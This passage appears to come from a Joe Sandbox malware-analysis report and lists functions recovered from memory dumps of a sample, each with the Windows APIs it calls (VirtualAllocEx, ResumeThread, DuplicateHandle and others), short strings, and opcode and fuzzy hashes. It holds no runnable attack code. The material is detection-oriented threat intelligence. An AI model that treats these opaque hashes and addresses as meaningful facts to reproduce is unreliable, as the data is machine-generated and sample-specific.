DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F0D717

Memory Dump Source

Source File: 0000000A.00000002.1776138099.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f00000_QGVhHsAOjb.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: faacfaddacc779879514a0489b7f9e32dc95c8dc1f9473fe40ca9e1c22e2b7aa
Instruction ID: 7ba5309a4836ee7a63ee2d29389f0da813f19e7d59c2960e8158a0731b06f782
Opcode Fuzzy Hash: faacfaddacc779879514a0489b7f9e32dc95c8dc1f9473fe40ca9e1c22e2b7aa
Instruction Fuzzy Hash: 1A21E0B5900218DFDB10CFA9D584AEEBBF4EB48324F14841AE958B7250D374A950CFA5

Function 050E0988 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 050E09F6

Memory Dump Source

Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e983a9f6e00476e6d11d9bf0359da83fcc1fa76d333f15ee566eddea73222e58
Instruction ID: 8011ce1ae58a493847d0ea0da970ee4cab43b7b68213156a25f8edc15fe5a2f2
Opcode Fuzzy Hash: e983a9f6e00476e6d11d9bf0359da83fcc1fa76d333f15ee566eddea73222e58
Instruction Fuzzy Hash: 281167719002498FCB20DFAAC844BDFBFF5EF88320F208419E559A7250C775A550CFA0

Function 0767FBA0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0767FC02

Memory Dump Source

Source File: 0000000A.00000002.1781536098.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7670000_QGVhHsAOjb.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3a343728ee40a7641aa918e4aeaf5e84b387b417aa26002ae4619e37a3e6a266
Instruction ID: 9f482f39f7b78e5ab561da47a4ef149847b5b67f2406c9d141fba739010e38ca
Opcode Fuzzy Hash: 3a343728ee40a7641aa918e4aeaf5e84b387b417aa26002ae4619e37a3e6a266
Instruction Fuzzy Hash: B81155B19002488FCB20DFAAC444BDFFBF4AB88324F208829C459A7250CB75A945CFA4

Function 050E3E43 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 050E3EA5

Memory Dump Source

Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 5bc4267a28e2ed12e3a643d01ffc8bd5ab42825c04bde5fcfb88cc5f1ed05ab4
Instruction ID: 14a57c6de17fa847c02e2208fd9fd4f9389d43493683ef1447cf92e1d9e79889
Opcode Fuzzy Hash: 5bc4267a28e2ed12e3a643d01ffc8bd5ab42825c04bde5fcfb88cc5f1ed05ab4
Instruction Fuzzy Hash: F311F2B5800249DFDB20DF9AD489BDEBBF4EB48314F20881AD959A7250C375A984CFA1

Function 02F0AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02F0AFFE

Memory Dump Source

Source File: 0000000A.00000002.1776138099.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f00000_QGVhHsAOjb.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9fd0308b416438b743bab1c99abe8b389b2eacd9e5b4c2d2e1ae00037bf4ff7d
Instruction ID: f72279f987242a57930582fed6cd8ee60ee4ce0463e31f85bd97a8fe7b3d6be6
Opcode Fuzzy Hash: 9fd0308b416438b743bab1c99abe8b389b2eacd9e5b4c2d2e1ae00037bf4ff7d
Instruction Fuzzy Hash: F21110B6C003498FCB20CF9AC444BDEFBF4AB88328F10842AD568A7250D375A545CFA1

Function 057127F4 Relevance: 1.5, Strings: 1, Instructions: 295COMMON

Download Yara Rule

Strings

(bq, xrefs: 05713EE2

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: ce5819097744208c6fd49ab784144ddafb47557d5a32c0347d3ec45717c1da5d
Instruction ID: a22f20edc76435dfd18b109d4680fbaa4cb42b4fa7782c7467b66c02243440c5
Opcode Fuzzy Hash: ce5819097744208c6fd49ab784144ddafb47557d5a32c0347d3ec45717c1da5d
Instruction Fuzzy Hash: 32910F71A05348DFCB18DFA9D8486AEBFF6FF85300F1088AAE846A7351DB349805CB54

Function 050E3E48 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 050E3EA5

Memory Dump Source

Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6755e683afab408bb79b286ca2a93e5e6b1a4bef15d8f831b8ad1d7d617b581b
Instruction ID: 9de51a264787fab9cbf15cc1f66146231777268144a83a358cd26fbc6c1df0fd
Opcode Fuzzy Hash: 6755e683afab408bb79b286ca2a93e5e6b1a4bef15d8f831b8ad1d7d617b581b
Instruction Fuzzy Hash: E711D3B58003499FDB20DF9AD449BDEFFF8EB48324F208419D558A7250D375A544CFA5

Function 0571CC78 Relevance: 1.5, Strings: 1, Instructions: 231COMMON

Download Yara Rule

Strings

(bq, xrefs: 0571CD84

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: ea4472396fac128b11b0c5508cea2e104899571966bcbb8533fe2bcf4b035167
Instruction ID: fa44f41d647553ad5c220171355305403799fece5b133e71acae01a61d952e1a
Opcode Fuzzy Hash: ea4472396fac128b11b0c5508cea2e104899571966bcbb8533fe2bcf4b035167
Instruction Fuzzy Hash: 20817B70B402158FCB15DFACD485AAEBBF6FF89740F108569E406AB3A4DB34AC45CB94

Function 0571CD83 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

(bq, xrefs: 0571CD84

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 5d2fe9f592ad1a51cf576575c256d54b596409d53d4ad40abc4c19e6d0cd0847
Instruction ID: 05f4000f45395d710d4f9959d81a28bf3d3642564f35c6da2652069ae54bd2ca
Opcode Fuzzy Hash: 5d2fe9f592ad1a51cf576575c256d54b596409d53d4ad40abc4c19e6d0cd0847
Instruction Fuzzy Hash: 82518C75B402058FCB1AEF7DC44466E7BE6FF89600B248469E406DB3A4DA74EC45CB91

Function 0571B868 Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

(bq, xrefs: 0571B8F9

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 5979e9d46523f5d611a78737d9b50dac526a22c66cab04854375bb682dc04846
Instruction ID: ab537f0f3b1d4202630ee7452c2f7c2a0929ee7b3cb68f147f179cacade191c9
Opcode Fuzzy Hash: 5979e9d46523f5d611a78737d9b50dac526a22c66cab04854375bb682dc04846
Instruction Fuzzy Hash: 2141D231B046618FCB0AAB7D941812E7BE7BFC5690718456ED90BDF394EE24CC0297D9

Function 0571F7BB Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

Nv]q, xrefs: 0571F84D

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID: Nv]q
API String ID: 0-585401923
Opcode ID: 4412924b65286433bc0fc1b9e60881e6ecbf9fe77be28fcf3ce9868fa9ffa448
Instruction ID: 7ecec43a1012379b930c63cff3df9c76d444debb826c76ce28b62f9c9bcdfa6d
Opcode Fuzzy Hash: 4412924b65286433bc0fc1b9e60881e6ecbf9fe77be28fcf3ce9868fa9ffa448
Instruction Fuzzy Hash: E8410570E01609DBDB04EFD9E4886DDBFB1FF88300F119065E899AB258DB319965CB58

Function 0571F7C8 Relevance: 1.4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

Nv]q, xrefs: 0571F84D

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID: Nv]q
API String ID: 0-585401923
Opcode ID: 0019e066deb1697d887f689de399af3c99324a2be6b4b16154ff8cd92992e9c1
Instruction ID: 80b5d3bbcb27bc051d795b160e7f57d2a875783b46c1fc7de53a07a9bd8f99d4
Opcode Fuzzy Hash: 0019e066deb1697d887f689de399af3c99324a2be6b4b16154ff8cd92992e9c1
Instruction Fuzzy Hash: 18411670E0160DDBCB04EFD9E4886DDBFB1FF88300F519065E898AB258DB309965CB59

Function 05712CB4 Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

x=_, xrefs: 05712D5A

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID: x=_
API String ID: 0-882893857
Opcode ID: 8e1bbab6c2e0ce824a4be3b58964d75d1f3c0d1eabd1e85f567e4aaaec9c4ac4
Instruction ID: c23aaee86b85ad480138c2d00e9f0e3ae0f0c4e94c01bd713b546667f47344d7
Opcode Fuzzy Hash: 8e1bbab6c2e0ce824a4be3b58964d75d1f3c0d1eabd1e85f567e4aaaec9c4ac4
Instruction Fuzzy Hash: 424103B5D00219CFDB24DFAAC584ACDBFB5BF48304F24802AD808BB215D7756A4ACF94

Function 0571266C Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

x=_, xrefs: 05712D5A

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID: x=_
API String ID: 0-882893857
Opcode ID: aa62118619d9a53559bf6ad6af7f45b2f3df8c3010ab578abe788b56b0cc4829
Instruction ID: 6189e697cdc9310b256cc67fc8984b7ed7439bc89b141a8b107f83a53d541974
Opcode Fuzzy Hash: aa62118619d9a53559bf6ad6af7f45b2f3df8c3010ab578abe788b56b0cc4829
Instruction Fuzzy Hash: 8241F3B0D00619DFDB24DF9AC984ACDBBB5BF48304F248029D808BB215D7756A46CF95

Function 05712BB8 Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

x=_, xrefs: 05712BEB

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID: x=_
API String ID: 0-882893857
Opcode ID: 13f491ab9683c42cf5d082e806a56f96c7b12e3edfb7fcb5f3fd4cd780dc1536
Instruction ID: 44d729a5fb62eb4a66c76c66194170021a5f088593ceba91d8d5abdad4d5b217
Opcode Fuzzy Hash: 13f491ab9683c42cf5d082e806a56f96c7b12e3edfb7fcb5f3fd4cd780dc1536
Instruction Fuzzy Hash: D42104756042058FC701EF39D8488ABBBF6FF81200B1488AAD946DB352EF71DC098BA5

Function 05712B50 Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

x=_, xrefs: 05712BEB

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID: x=_
API String ID: 0-882893857
Opcode ID: 940c9e367daefa5e0a8957ba747f0ff5688bb7869fb905be6ba296cb0df4007a
Instruction ID: 5ed7c180e82103bec6dc77ccc3f1c25d8df48a45c5d09cb34b38dfe6118d3550
Opcode Fuzzy Hash: 940c9e367daefa5e0a8957ba747f0ff5688bb7869fb905be6ba296cb0df4007a
Instruction Fuzzy Hash: F62124B4A002058FC711EF79D9458AEBBF6FF84210B1089BAD805DB361EB30ED089F94

Function 05712BA9 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

x=_, xrefs: 05712BEB

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID: x=_
API String ID: 0-882893857
Opcode ID: 63c9edc05a873a951c6e7c19ee67d353c9e4581107a8240d9d56173cb256ef22
Instruction ID: 079448f8fb84db266fb30eab3b1b782b420a6033bbe026a21aee01200db0eea1
Opcode Fuzzy Hash: 63c9edc05a873a951c6e7c19ee67d353c9e4581107a8240d9d56173cb256ef22
Instruction Fuzzy Hash: 3521D5746002058FC711EF7AC8488ABBBF6FFC1610B0089A9D945DB351EB30DD088B95

Function 0571DC71 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0571DCD1

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: ff809e9d7c30580dea98902847c89436df519a7cfccc19375a8fc01f205d114e
Instruction ID: d8506c5f8d5588b37d09f009a9c7a1daf5650c8eca9dee939f764e226e59a8d0
Opcode Fuzzy Hash: ff809e9d7c30580dea98902847c89436df519a7cfccc19375a8fc01f205d114e
Instruction Fuzzy Hash: 4511CB70D092499FCB01EFB4E95628DBFF0FF41201F0505A89805AB292EF385A08CB41

Function 0571DCA0 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0571DCD1

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 76330119080cfac1a2706492456a6830ce215e4931ddd625d6f4b1da75d5f766
Instruction ID: 963774ef2474ebe9dbf563d91974b3aae60d988fd7c706d5f08db0473a6ee9da
Opcode Fuzzy Hash: 76330119080cfac1a2706492456a6830ce215e4931ddd625d6f4b1da75d5f766
Instruction Fuzzy Hash: 8CF01970A0520A9FCB44FFB8E69659CBFF1FB84201F1005A8D805AB354EF345E488B41

Function 05719630 Relevance: .7, Instructions: 733COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85e485c502c68c7b1264c1d957cb60a33b4b3153fdc20885242861d209ac3b02
Instruction ID: 11133aecdf3840c95e9d39113b1bf8dc5b01d16913b6b793b5a8ead59efa894b
Opcode Fuzzy Hash: 85e485c502c68c7b1264c1d957cb60a33b4b3153fdc20885242861d209ac3b02
Instruction Fuzzy Hash: 3C720F31D10619CFDB14EF68C898AADFBB1FF45304F008699D54AA7265EF309AC9CB81

Function 057165E8 Relevance: .6, Instructions: 551COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebf24b32c085ed64fd5c5cc3556d07f2593cd8e6f5a6bf1e3466a857084ef806
Instruction ID: 13a2b9683ba10ad4d555d525cfb6dc26034771be52b53cf29483d8a328240a1b
Opcode Fuzzy Hash: ebf24b32c085ed64fd5c5cc3556d07f2593cd8e6f5a6bf1e3466a857084ef806
Instruction Fuzzy Hash: FF42D631E106198FCB25DF68C8946EDF7B1FF89300F1186A9D859BB251EB30AA85CF44

Function 0571AF00 Relevance: .5, Instructions: 500COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d58cfc29ca77eca6aff907baaef41959e3d0038651d6b01b927127ce57db4cff
Instruction ID: 165ddba62c21d5cd3835928b0a522f141382a67d7db36a839691ddc08e437422
Opcode Fuzzy Hash: d58cfc29ca77eca6aff907baaef41959e3d0038651d6b01b927127ce57db4cff
Instruction Fuzzy Hash: 63221A30A10615CFCB14DF69C888AADB7B2FF89300F5485A9D80AAB365DB31ED49DF54

Function 057165DB Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64e99fedd3724e6368c85b74db8adf63b8d5215f57dcaf705b8381479147fad2
Instruction ID: dd9d2e9f1a1e14e86710328471c523410a9172aee9ad083ebb3322b9669d7f1d
Opcode Fuzzy Hash: 64e99fedd3724e6368c85b74db8adf63b8d5215f57dcaf705b8381479147fad2
Instruction Fuzzy Hash: 15E1E831E006198FCB24DF68C9946EDF7B2BF49300F1486A9D859BB651EB30AE85DF44

Function 05718FC0 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ea1a72c419fbca7fa280d579ef6b0899eda19cb71b79b78d5133db03f540abd
Instruction ID: 56c04c4ea84307e358b39f426b46b1f330b87c2dfd9874edf83bc0a0d17075df
Opcode Fuzzy Hash: 9ea1a72c419fbca7fa280d579ef6b0899eda19cb71b79b78d5133db03f540abd
Instruction Fuzzy Hash: B891087591070ACFCB41DF68C884999FBF5FF89310B14879AE919AB255EB30E985CB80

Function 0571AED0 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d4acdf1dd7d0b0c40811cf30eb55b87a851d3be5f71a34dabfd3eeb2faec4cd
Instruction ID: 6bb21153de4059458d1228c5391b6d53e43d3d4cc2464275ec44a0135fb3124f
Opcode Fuzzy Hash: 2d4acdf1dd7d0b0c40811cf30eb55b87a851d3be5f71a34dabfd3eeb2faec4cd
Instruction Fuzzy Hash: 776168306106408FCB15DB79C898BACBBF2BF89310F0485BDD85AAF3A5DB719849CB54

Function 05718FB1 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b39542ddcb9a9d1a7bf44fe7472372d6e9aee47521f908c19c41d19ec317dcc3
Instruction ID: 43a3c06a881704863d149e81ddc5d970d15a26416cbd33b2ee90156b825f11e6
Opcode Fuzzy Hash: b39542ddcb9a9d1a7bf44fe7472372d6e9aee47521f908c19c41d19ec317dcc3
Instruction Fuzzy Hash: 29613B7591070ACFCB11DF68C894999FBB1FF89310B158796E819EB256EB30E9C5CB80

Function 05711C34 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0f8edf147da60e0b00fb582ff652bc0e501c28110bce1cfa9ad558b83fcd89
Instruction ID: 2c8fffad9ecb9d3c05a17ce22b94b701110a3ac60ba68cfc61c3aaa1a6a79bba
Opcode Fuzzy Hash: 5e0f8edf147da60e0b00fb582ff652bc0e501c28110bce1cfa9ad558b83fcd89
Instruction Fuzzy Hash: 9B515675E002599FCB15DFAEC5489AFBFF9EF88300F10842AE915E3251DB749905CB94

Function 05716E40 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a6d5a1d9f5ebc553ae5554c96c76a466a79b8d56db2aa3c01d219764da7446b
Instruction ID: 4e8f2b41467322f35d1efe2f7578a758850d8ad15fcc0c2ed55c0f8c9e802ce4
Opcode Fuzzy Hash: 7a6d5a1d9f5ebc553ae5554c96c76a466a79b8d56db2aa3c01d219764da7446b
Instruction Fuzzy Hash: A5514A74B006048FCB18DB68D498EADBBF6BF88710B1485A9E806DB760DB74EC45DB44

Function 0571A498 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb15f9e74e465dad0beadd4ac5f6f9e1e8877ce9aac25ccd1781272ae260491e
Instruction ID: 111885bf5b21ab87f681b0ae07aa309298ab5755f815b4827a4826a12b0ecf5b
Opcode Fuzzy Hash: eb15f9e74e465dad0beadd4ac5f6f9e1e8877ce9aac25ccd1781272ae260491e
Instruction Fuzzy Hash: 14414C757402058FCB15DF6DC484A6EBBFAFF89704B108469E8069B368DB74EC45CB90

Function 05717273 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94a7eff020e166355118cf1e0981d55839458314971193bf81257fba6810acd8
Instruction ID: 140a682f9da3d1c5eeeb043a3e5494c3b94db90002491fa115bf6e714ed18855
Opcode Fuzzy Hash: 94a7eff020e166355118cf1e0981d55839458314971193bf81257fba6810acd8
Instruction Fuzzy Hash: 49412D35A10719CFCB04EF78C884AADFBB6FF89304F008569E515AB365EB71A945CB81

Function 05717280 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e5477422a0fe25b725c7d19161a5d640574d60b5b80ccbc047b3681d6573061
Instruction ID: 3d4154a3fdc196f8191c53a59da298d4a99ae5d72599a9e2fc2b247e12f5279a
Opcode Fuzzy Hash: 7e5477422a0fe25b725c7d19161a5d640574d60b5b80ccbc047b3681d6573061
Instruction Fuzzy Hash: C0411C35A10719CFCB04EF68C8849ADF7B6FF89304F008569E5156B365EB71A945CB81

Function 05714DFB Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9023e6d802dbd4a239ddc0851b09cb9ee690da5dcfeee06de27061c7e904491f
Instruction ID: faeebcf3f4fdc2b99762fb05828d0fdb4db9602d309074dad8d290a3c5e12b73
Opcode Fuzzy Hash: 9023e6d802dbd4a239ddc0851b09cb9ee690da5dcfeee06de27061c7e904491f
Instruction Fuzzy Hash: 0441F875A0020ADFCB40DF68D88499EFBB6FF49314B14C669E818AB311E730A985CF90

Function 05711C28 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d0730cb6868e7eac5c64e26a1c2bb1f0bea65c172ac187dac764c25fd509696
Instruction ID: a45cb69e602c83860b3344ca51f0fd6b35a0b0c8e31716fd48e2d4092f53dda7
Opcode Fuzzy Hash: 1d0730cb6868e7eac5c64e26a1c2bb1f0bea65c172ac187dac764c25fd509696
Instruction Fuzzy Hash: 3341C1B4D003189FDB24CF9AC988ADEFBB1BF48710F10812AE818BB215D7705845CF95

Function 05717178 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcf7efc64ae2ec4da27d35255a44c662661eb4370721e5a4c5dc0a2f5dd3aecc
Instruction ID: 9e8d30aebd81305b0a69dd4dba1a85fa540b6a833232776a5093267b20c7bd27
Opcode Fuzzy Hash: bcf7efc64ae2ec4da27d35255a44c662661eb4370721e5a4c5dc0a2f5dd3aecc
Instruction Fuzzy Hash: 8E316E35B006199FCF15EF68D85889DF7B6FF89210B048569E906BB310EB35AD15CB80

Function 05714E08 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c085e109590706d0da1e30f723936296eb28e900351819ba962d4ee6be6a030e
Instruction ID: 3ecdabec330f7dfc6d6b40585ebdce23dc9d7bf9d69b35b998e4c0a23c7f63ba
Opcode Fuzzy Hash: c085e109590706d0da1e30f723936296eb28e900351819ba962d4ee6be6a030e
